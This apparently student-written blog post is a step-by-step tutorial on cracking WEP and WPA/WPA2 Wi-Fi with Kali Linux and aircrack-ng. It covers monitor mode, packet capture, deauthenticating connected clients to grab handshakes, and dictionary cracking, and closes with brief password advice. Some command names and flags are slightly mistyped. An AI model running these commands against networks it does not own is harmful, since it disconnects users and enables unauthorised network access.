Hello Reader, I am srikar currently enrolled in Master Certificate in Cyber Security HackerU program, this is my first blog and I want to share some of my learnings with you about common WEP/WPA/WPA2 attacks and how to crack any WEP/WPA/WPA2 Wi-Fi considering you have the Dictionary for it to crack the WPA handshake or have more gpu power or if you can buy super computer also no issue
Let’s start the attack:
Requirements:
- kali_os
- wifi adapter (or) you base system was kali no need (or) use live kali plug into your laptop i hope most of laptop have wifi chip
note: in this attack i have not used any external adapter i used live kali flash usb drive and inserted into the laptop so it is not mandatory to have a external adapter
WEP ATTACK:
- Open terminal ctr+alt+t >> short_cut
- To capture the packets which are running on air we need to switch mange mode to monitor mode [use the following commands to switch to monitor mode]
>> iwconfig -> {it will list the wifi card interface and mode}
>> airmon-ng start {your wireless interface}->{it will change the interface from manage mode to monitor mode}
>> to verify the interface is in monitor mode type command iwconfig as show in above now we are in monitor mode..
3.To list the wifi interface around us use the following command
>> airodump-ng {wireless interface}
4. AS you see wep network was visible on first and it running on channel 11
Description about the options from above picture :
BSSID means MAC address of Access Point.
PWR means the intensity of the signal.
Beacons means no of Announcement Packet’s send by Access Point.
Data means no of captured packets.
#/s means no of data packets per second over interval of 10 secs.
MB means maximum speed supported by Access Point.
ENC means encryption used.
CIPHER means cipher detected by the Adapter.
AUTH means the Authentication protocol in use.
ESSID states the name of Wi-Fi network.
5. Lets start to capture the packet from target system from following command.
>> airodump-ng — bssid {mac_address_of_target} -w {capture_file_name} {wireless interface name}
hit enter:
in my case it look like this as following picture:
it will show about the target like number of clients connected to it and the client mac address as show in below picture.
Description :
BSSID >> it is target mac address
STATIONS >> client mac_address connected to target
this two are important
6.AS we see above target as a client connected to it so let us disconnect him for two seconds by sending few DE authentication packets to his device , so when device trying to connect again to the router after disconnecting for the two seconds the router will ask for authentication for device so we as an attacker we will capture the authentication packet
command:
>> airplay-ng -6 -b {target router mac address} -h {connected client mac address of the target} {wireless interface name}
7. go to the file location where the capture file is located and type the following command.
>>aircrack-ng {file_name_of capture .cap file}
as we see the below picture we successfully cracked wep
LETS start wpa/wpa2 attack:
the main difference between wep and wpa/wpa2 here we required handshake
search for target first:
as you see the above target is running on wpa
Let’s capture the packets from the target using following command
>> airodump-ng — bssid {mac_address_of_target} -w {capture_file_name} {wireless interface name}
a client is connected to the target let send the DE authentication packets to it use the following command to send deauth
>>aireplay-ng — deauth {number_of_packets} -a {target mac address} -c {connected client mac address of the target} {wireless interface name}
IT look like this:
after successful deauthentication the client will start to reconnect to router then router will ask for authentication packet we as attacker we already started capturing the packet as soon as the authentication taken place we will get a successful handshake
we have handshake packet here now we will start cracking the password use the following command to crack password
>>aircrack-ng -w {password dictionary file} {file_name_of capture.cap file}
as we can see we successfully cracked password
note: cracking the password it depend on your system performance you need to have more gpu power in order to crack very quickly , it can crack with day to day life system but it take months and years of time based on password complexity
reference link password breaking using gpu:
https://www.youtube.com/watch?v=K-96JmC2AkE
To avoid the wifi attack:
update to the latest wifi protocols create at least password length of 12 using different combinations like numbers,letters,symbols it will make more complex to break in normal system it doesn’t mean it will not crack but it will take time to crack , change password every 30 days.
